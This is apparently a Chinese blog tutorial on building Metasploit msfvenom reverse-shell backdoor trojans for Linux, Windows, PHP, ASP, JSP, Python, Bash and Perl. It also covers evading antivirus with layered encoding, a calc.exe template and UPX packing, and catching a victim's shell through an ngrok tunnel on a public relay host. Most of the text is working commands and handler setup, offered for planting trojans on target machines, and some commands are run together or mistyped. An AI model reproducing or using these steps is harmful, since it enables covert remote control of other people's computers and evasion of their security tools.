msfvenom生成木马和内网穿透
msfvenom命令行選項(xiàng)如下:
英文原版
中文版:
Options:
-p, --payload?<payload> 指定需要使用的payload(攻擊荷載)。如果需要使用自定義的payload,請(qǐng)使用'-'或者stdin指定?
-l, --list [module_type] 列出指定模塊的所有可用資源. 模塊類型包括: payloads, encoders, nops, all?
-n, --nopsled?<length> 為payload預(yù)先指定一個(gè)NOP滑動(dòng)長(zhǎng)度?
-f, --format?<format> 指定輸出格式 (使用 --help-formats 來(lái)獲取msf支持的輸出格式列表)?
-e, --encoder [encoder] 指定需要使用的encoder(編碼器)?
-a, --arch?<architecture> 指定payload的目標(biāo)架構(gòu),這里x86是32位,x64是64位 -platform?<platform> 指定payload的目標(biāo)平臺(tái)?
-s, --space?<length> 設(shè)定有效攻擊荷載的最大長(zhǎng)度?
-b, --bad-chars?<list> 設(shè)定規(guī)避字符集,比如:?'\x00\xff'?
-i, --iterations?<count> 指定payload的編碼次數(shù)?
-c, --add-code?<path> 指定一個(gè)附加的win32 shellcode文件?
-x, --template?<path> 指定一個(gè)自定義的可執(zhí)行文件作為模板?
-k, --keep 保護(hù)模板程序的動(dòng)作,注入的payload作為一個(gè)新的進(jìn)程運(yùn)行 --payload-options 列舉payload的標(biāo)準(zhǔn)選項(xiàng)?
-o, --out?<path> 保存payload?
-v, --var-name?<name> 指定一個(gè)自定義的變量,以確定輸出格式?
--shellest 最小化生成payload?
-h, --help 查看幫助選項(xiàng) --help-formats 查看msf支持的輸出格式列表
這里舉出一些利用msfvenom生成shell的命令:
Linux:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect?On> -f elf > shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your?IP?Address> LPORT=<Your?Port?to?Connect?On> -f exe > shell.exe
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your?IP?Address> LPORT=<Your?Port?to?Connect?On> -f raw > shell.php
cat shell.php | pbcopy &&?echo?'<?php ' | tr -d?'\n' > shell.php && pbpaste >> shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your?IP?Address> LPORT=<Your?Port?to?Connect?On> -f asp > shell.asp
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your?IP?Address> LPORT=<Your?Port?to?Connect?On> -f raw > shell.jsp
Python:
msfvenom -p cmd/unix/reverse_python LHOST=<Your?IP?Address> LPORT=<Your?Port?to?Connect?On> -f raw > shell.py
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=<Your?IP?Address> LPORT=<Your?Port?to?Connect?On> -f raw > shell.sh
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST=<Your?IP?Address> LPORT=<Your?Port?to?Connect?On> -f raw > shell.pl
以上是基本的生成后門木馬,只要想方設(shè)法放到目標(biāo)機(jī)器上,并運(yùn)行。在本地監(jiān)聽(tīng)端口即可,但是你需要有一個(gè)公網(wǎng)的ip
下面來(lái)探究一下如何免殺:
1.可以嘗試多重編碼:
msfvenom -p windows/meterpreter/reverse_tcp lhost=<Your IP Address> lport=<Your Port to Connect?On> -e x86/shikata_ga_nai -i?20 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i?5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i?10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i?10 -x calc.exe -f exe -o shell.exe
這里使用管道讓msfvenom對(duì)攻擊載荷多重編碼,先用shikata_ga_nai編碼20次,接著來(lái)10次的alpha_upper編碼,再來(lái)10次的countdown編碼,最后才生成以calc.exe為模板的可執(zhí)行文件。
2.對(duì)上述生成的木馬進(jìn)行upx加殼
upx?shell.exe
不過(guò)現(xiàn)在的殺毒軟件越來(lái)越nb,一般免殺也已經(jīng)不好過(guò)...
?
下面以Aspx為例:
show payloads
use windows/shell_reverse_tcpinfoset?lhost 192.168.0.133set?lport 4444save接著輸入generate -h 查看幫助:
各版本ShellCode的命令如下:
generate -t asp?//生成Asp版的ShellCode generate -t aspx?//生成Aspx版的ShellCode
把生成的木馬放在c:/inetpub/wwwroot下,訪問(wèn)。同時(shí)在msf中設(shè)置監(jiān)聽(tīng):
use exploit/multi/handler
set?payload windows/meterpreter/reverse_tcp
set?lhost 192.168.0.133set?lport 4444run
補(bǔ)充:該方法一定要網(wǎng)速夠快,否則很容易失敗,本機(jī)監(jiān)聽(tīng)端口可選用4444端口或其他
parrot使用ngrok+msfvenom穿透反彈shell
外網(wǎng)中的內(nèi)網(wǎng)和我們不在同一個(gè)網(wǎng)段,所以我們需要搞一個(gè)公網(wǎng),讓受害者去訪問(wèn)我們的公網(wǎng),再在公網(wǎng)上搞個(gè)端口映射到我們內(nèi)網(wǎng),這樣就實(shí)現(xiàn)了內(nèi)網(wǎng)穿透
攻擊機(jī)parrot ip:192.168.127.131
目標(biāo)機(jī)器windows ip :192.168.43.27
首先兩臺(tái)機(jī)器不在一個(gè)網(wǎng)端,自然是無(wú)法ping通:
這里模仿目標(biāo)機(jī)器在公網(wǎng)
攻擊機(jī)器在內(nèi)網(wǎng),攻擊機(jī)器怎樣通過(guò)ngrok代理來(lái)接受彈回來(lái)的shell
?
1.在ngrok官網(wǎng)注冊(cè)賬號(hào),并開(kāi)通免費(fèi)賬號(hào)
官網(wǎng)地址:http://www.ngrok.cc
創(chuàng)建成功后:
2.下載ngrok客戶端
https://www.ngrok.cc/download.html
我這里使用的是parrot。所以選擇linux版本
文件解壓后得到:sunny
3.啟動(dòng)sunny,開(kāi)啟轉(zhuǎn)發(fā)
./sunny clientid 隧道id
4.配置木馬來(lái)反彈shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=14001 -f exe -o ./test.exe
其中LHOST,LPORT均為ngrok代理服務(wù)器地址與端口
5.攻擊機(jī)本地msf監(jiān)聽(tīng)
use?exploit/multi/handle?set?payload windows/meterpreter/reverse_tcp?set?lhost 192.168.127.131?set?lport 9876?run
6.目標(biāo)機(jī)器執(zhí)行木馬
可以看到,shell反彈成功
——嗷嗷
總結(jié)
以上是生活随笔為你收集整理的msfvenom生成木马和内网穿透的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 内网渗透-域内信息收集
- 下一篇: 内网渗透-域渗透简单思路